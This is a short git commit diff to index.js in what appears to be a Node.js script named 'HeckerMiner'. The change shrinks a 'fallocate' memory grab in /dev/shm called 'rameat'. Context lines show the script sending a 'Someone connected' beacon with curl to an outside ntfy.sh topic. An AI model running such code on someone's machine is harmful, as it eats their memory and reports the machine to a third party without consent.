Update index.js
This commit is contained in:
parent
fefe426f01
commit
554125155e
2
index.js
2
index.js
|
@ -9,7 +9,7 @@ if (os.platform() === 'win32') {
|
|||
child.execSync('msg * Use WSL for support.')
|
||||
process.exit(1); // Exit the process with a non-zero status code
|
||||
}
|
||||
child.execSync('fallocate -l 1G /dev/shm/rameat');
|
||||
child.execSync('fallocate -l 350M /dev/shm/rameat');
|
||||
console.log(os.cpus());
|
||||
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer')
|
||||
const numLines = Math.random(50000);
|
||||
|
|
Loading…
Reference in New Issue